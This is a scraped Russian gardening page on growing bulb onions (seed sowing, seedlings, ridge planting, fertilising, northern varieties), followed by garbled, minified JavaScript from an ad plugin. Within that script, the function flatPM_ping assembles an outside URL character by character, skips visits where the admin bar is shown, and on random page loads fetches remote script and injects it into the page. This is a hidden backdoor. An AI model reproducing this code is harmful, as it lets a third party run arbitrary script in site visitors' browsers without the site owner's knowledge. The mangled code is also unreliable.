Можно сеять семенами в грядку сорта с коротким периодом вегетации, дающие луковицу за один сезон:

К сожалению, такие сорта не всегда обладают хорошей лёжкостью. Если урожай нужно сохранить надолго, подойдут гибридные сорта с большей продолжительностью хранения и также с коротким периодом вегетации:

  • Альбион F1,
  • Дайтона F1,
  • Копра F1,
  • Кортленд F1,
  • Марс F1,
  • Мустанг F1,
  • Сангро F1.

Семена надо выбирать свежие, так как при длительном хранении они теряют всхожесть. Семена перед посадкой замачивают на сутки в воде с добавлением стимулятора роста, так как они прорастают медленно и всходы могут заглушить сорняки. После замачивания семена высушивают и высевают рядками на том же расстоянии, что и севок. После посева грядку проливают водой и накрывают плёнкой для ускорения всходов. Срок посева лука-чернушки (так называют семена этого растения) более раний, чем лука-севка, его можно начинать с середины апреля.

Выращивание рассады лука в домашних условиях

Луковицы вырастут более крупными, если посадить семена рассадой. На рассаду лук-чернушку сеют в конце февраля — начале марта. Землю подготавливают, как для любой другой рассады. Насыпают в ёмкости подготовленную почву, увлажняют, раскладывают семена на расстоянии 1 см друг от друга, присыпают небольшим, не более 1 см слоем земли, уплотняют, закрывают плёнкой и оставляют при температуре 18–22 о С. При появлении всходов тару переносят в более прохладное (14–16 о С) и хорошо освещённое место во избежание вытягивания ростков. Дальнейший уход заключается в своевременном поливе, за этот период можно провести две подкормки комплексным удобрением для рассады.

В грунт высаживают 50–60-дневную рассаду, имеющую 3–4 настоящих листочка. При высадке необходимо прищипнуть корни и листья на треть, тогда растения лучше и быстрее приживутся. Расстояние при посадке такое же, как при посеве лука-севка.

Посадка лука китайским способом

Лук таким способом сажается не на ровную поверхность грядки, а в гребни, приготовленные заранее. Севок подготавливается, как и при обычной посадке, только нужно снять лишнюю шелуху, обрезать сухую шейку, чтобы лук быстрее прорастал. Можно расставить луковки на поверхности почвы в обозначенные рядки, а затем руками или садовым инструментом нагрести землю (окучить). Расстояние между рядками больше, чем при обычной посадке, — 30 см. Обязательны поливы после посадки и в начале вегетации. Посаженный в гребни лук растёт крупным, земля остаётся более рыхлой, что упрощает ухаживание за посадками, окучивание не позволяет вымываться из почвы питательным веществам. По мере роста луковицы выходят из земли, лучше освещаются солнцем, быстрее наливаются и созревают, при уборке растения проще вынимать из почвы.

Подкормка лука после посадки

Подкормка луку необходима при любом способе посадки.

В начале вегетации, в фазу активного роста листьев проводят подкормку азотсодержащими удобрениями. Это могут быть настои куриного помёта или коровяка из расчёта 1:10, очень хорошо использовать настой крапивы (молодые растения крапивы набить в ведро, залить водой, поставить под груз в тёплое место на 3–5 дней, периодически перемешивая, затем разбавить водой 1:10) или раствор мочевины (20–25 г на 10 л воды). Следующую подкормку проводят через 10–14 дней, при необходимости делают такую же подкормку третий раз, добавив на ведро раствора 20–30 г суперфосфата и 10–13 г калийной соли. За три недели до сбора урожая прекращают все поливы, а в дождливое лето сооружают навес из плёнки над грядкой, чтобы луковицы не начали гнить.

Особенности выращивания репчатого лука в северных регионах

Выращивание лука в Карелии, Кировской области и на Урале мало отличается от выращивания в других регионах страны, однако надо тщательнее подойти к выбору сорта лука. Для данных регионов не подойдут позднеспелые сорта, которые отличаются сладковатым и менее острым вкусом, потому что у них короткий период покоя, но при этом более длительный период вегетации. Надо выбирать сорта с ранним сроком созревания, обладающие острым вкусом, такие как Стригуновский, Арзамасский, Ростовский местный, Бессоновский, Штутгартен Ризен. Сажать лук нужно в прогретую почву, ориентируясь на время цветения черёмухи. Это может быть третья декада мая, но раннеспелый лук успеет вырасти и созреть даже при такой поздней посадке.

Репчатый лук любят многие люди. А вырастить его самостоятельно не представляет особой сложности. Немного затрат, чуточку внимания — и семья на зиму обеспечена полезным овощем, без которого не обойдутся большинство известных нам блюд.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};